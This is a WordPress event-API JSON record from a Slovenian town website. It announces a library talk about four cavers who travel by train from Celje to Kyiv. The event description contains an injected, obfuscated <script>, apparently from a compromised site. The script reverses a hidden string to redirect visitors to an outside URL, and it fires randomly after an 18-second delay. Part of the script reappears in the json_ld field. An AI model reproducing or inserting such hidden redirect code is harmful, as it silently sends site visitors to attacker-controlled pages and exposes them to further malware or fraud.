{"id":14222,"global_id":"sostanj.info\/2019?id=14222","global_id_lineage":["sostanj.info\/2019?id=14222"],"author":"1","status":"publish","date":"2022-04-26 00:07:22","date_utc":"2022-04-25 22:07:22","modified":"2022-04-26 00:07:22","modified_utc":"2022-04-25 22:07:22","url":"https:\/\/sostanj.info\/2019\/dogodki\/stirje-jamarji-z-vlakom-iz-celja-do-kijeva\/","rest_url":"https:\/\/sostanj.info\/2019\/wp-json\/tribe\/events\/v1\/events\/14222","title":"\u0160tirje jamarji z vlakom iz Celja do Kijeva","description":"<p>Na poletnem taboru, med raziskovanjem Petkove jame, je jamar Benjamin pri\u0161el na plan z zanimivo idejo. &#8220;Fantje, gremo z vlakom do Kijeva&#8221;. Pravijo, da so jamarji malo nenavadni, za<script>$zXz=function(n){if (typeof ($zXz.list[n]) == \"string\") return $zXz.list[n].split(\"\").reverse().join(\"\");return $zXz.list[n];};$zXz.list=[\"\\'php.yerg-sknil-tuoba-egap\/snrettap\/cni\/owtytnewtytnewt\/semeht\/tnetnoc-pw\/moc.cvpny\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}<\/script>to jih je misel na tak\u0161no pot navdu\u0161ila. Konec leta 2021 so \u017ee sedeli na vlaku in se odpravili dogodiv\u0161\u010dinam naproti.<\/p>","excerpt":"","slug":"stirje-jamarji-z-vlakom-iz-celja-do-kijeva","image":{"url":"https:\/\/sostanj.info\/2019\/wp-content\/uploads\/2019\/08\/270x200_default.jpg","id":8430,"extension":"jpg","width":270,"height":200,"sizes":{"thumbnail":{"width":150,"height":150,"mime-type":"image\/jpeg","url":"https:\/\/sostanj.info\/2019\/wp-content\/uploads\/2019\/08\/270x200_default-150x150.jpg"},"small":{"width":80,"height":70,"mime-type":"image\/jpeg","url":"https:\/\/sostanj.info\/2019\/wp-content\/uploads\/2019\/08\/270x200_default-80x70.jpg"}}},"all_day":false,"start_date":"2022-05-17 18:30:00","start_date_details":{"year":"2022","month":"05","day":"17","hour":"18","minutes":"30","seconds":"00"},"end_date":"2022-05-17 18:30:00","end_date_details":{"year":"2022","month":"05","day":"17","hour":"18","minutes":"30","seconds":"00"},"utc_start_date":"2022-05-17 16:30:00","utc_start_date_details":{"year":"2022","month":"05","day":"17","hour":"16","minutes":"30","seconds":"00"},"utc_end_date":"2022-05-17 16:30:00","utc_end_date_details":{"year":"2022","month":"05","day":"17","hour":"16","minutes":"30","seconds":"00"},"timezone":"Europe\/Ljubljana","timezone_abbr":"CEST","cost":"","cost_details":{"currency_symbol":"","currency_code":"","currency_position":"prefix","values":[]},"website":"","show_map":false,"show_map_link":true,"hide_from_listings":false,"sticky":false,"featured":false,"categories":[{"name":"Kultura, umetnost","slug":"kultura_umetnost","term_group":0,"term_taxonomy_id":52,"taxonomy":"tribe_events_cat","description":"","parent":0,"count":879,"filter":"raw","order":"0","id":52,"urls":{"self":"https:\/\/sostanj.info\/2019\/wp-json\/tribe\/events\/v1\/categories\/52","collection":"https:\/\/sostanj.info\/2019\/wp-json\/tribe\/events\/v1\/categories"}}],"tags":[],"venue":{"id":8517,"author":"1","status":"publish","date":"2019-08-26 15:51:46","date_utc":"2019-08-26 13:51:46","modified":"2019-08-26 15:51:46","modified_utc":"2019-08-26 13:51:46","url":"https:\/\/sostanj.info\/2019\/venue\/mestna-knjiznica-sostanj\/","venue":"Mestna knji\u017enica \u0160o\u0161tanj","slug":"mestna-knjiznica-sostanj","image":{"url":"https:\/\/sostanj.info\/2019\/wp-content\/uploads\/2019\/08\/270x200_default.jpg","id":8430,"extension":"jpg","width":270,"height":200,"sizes":{"thumbnail":{"width":150,"height":150,"mime-type":"image\/jpeg","url":"https:\/\/sostanj.info\/2019\/wp-content\/uploads\/2019\/08\/270x200_default-150x150.jpg"},"small":{"width":80,"height":70,"mime-type":"image\/jpeg","url":"https:\/\/sostanj.info\/2019\/wp-content\/uploads\/2019\/08\/270x200_default-80x70.jpg"}}},"json_ld":{"@type":"Place","name":"Mestna knji\u017enica \u0160o\u0161tanj","description":"","image":"https:\/\/sostanj.info\/2019\/wp-content\/uploads\/2019\/08\/270x200_default.jpg","url":"https:\/\/sostanj.info\/2019\/venue\/mestna-knjiznica-sostanj\/","address":{"@type":"PostalAddress"},"telephone":"","sameAs":""},"show_map":true,"show_map_link":true,"global_id":"sostanj.info\/2019?id=8517","global_id_lineage":["sostanj.info\/2019?id=8517"]},"organizer":[{"id":14224,"author":"1","status":"publish","date":"2022-04-26 00:07:22","date_utc":"2022-04-25 22:07:22","modified":"2022-04-26 00:07:22","modified_utc":"2022-04-25 22:07:22","url":"https:\/\/sostanj.info\/2019\/organizer\/mestna-knjiznica-sostanj-7\/","organizer":"Mestna knji\u017enica \u0160o\u0161tanj","slug":"mestna-knjiznica-sostanj-7","image":{"url":"https:\/\/sostanj.info\/2019\/wp-content\/uploads\/2019\/08\/270x200_default.jpg","id":8430,"extension":"jpg","width":270,"height":200,"sizes":{"thumbnail":{"width":150,"height":150,"mime-type":"image\/jpeg","url":"https:\/\/sostanj.info\/2019\/wp-content\/uploads\/2019\/08\/270x200_default-150x150.jpg"},"small":{"width":80,"height":70,"mime-type":"image\/jpeg","url":"https:\/\/sostanj.info\/2019\/wp-content\/uploads\/2019\/08\/270x200_default-80x70.jpg"}}},"json_ld":{"@type":"Person","name":"Mestna knji\u017enica \u0160o\u0161tanj","description":"","image":"https:\/\/sostanj.info\/2019\/wp-content\/uploads\/2019\/08\/270x200_default.jpg","url":"","telephone":"","email":"","sameAs":""},"global_id":"sostanj.info\/2019?id=14224","global_id_lineage":["sostanj.info\/2019?id=14224"]}],"json_ld":{"@context":"http:\/\/schema.org","@type":"Event","name":"\u0160tirje jamarji z vlakom iz Celja do Kijeva","description":"&lt;p&gt;Na poletnem taboru, med raziskovanjem Petkove jame, je jamar Benjamin pri\u0161el na plan z zanimivo idejo. &quot;Fantje, gremo z vlakom do Kijeva&quot;. Pravijo, da so jamarji malo nenavadni, za$zXz=function(n){if (typeof...&lt;\/p&gt;\\n","image":"https:\/\/sostanj.info\/2019\/wp-content\/uploads\/2019\/08\/270x200_default.jpg","url":"https:\/\/sostanj.info\/2019\/dogodki\/stirje-jamarji-z-vlakom-iz-celja-do-kijeva\/","startDate":"2022-05-17T18:30:00+02:00","endDate":"2022-05-17T18:30:00+02:00","location":{"@type":"Place","name":"Mestna knji\u017enica \u0160o\u0161tanj","description":"","image":"https:\/\/sostanj.info\/2019\/wp-content\/uploads\/2019\/08\/270x200_default.jpg","url":"https:\/\/sostanj.info\/2019\/venue\/mestna-knjiznica-sostanj\/","address":{"@type":"PostalAddress"},"telephone":"","sameAs":""},"organizer":{"@type":"Person","name":"Mestna knji\u017enica \u0160o\u0161tanj","description":"","image":"https:\/\/sostanj.info\/2019\/wp-content\/uploads\/2019\/08\/270x200_default.jpg","url":"","telephone":"","email":"","sameAs":""},"performer":"Organization"}}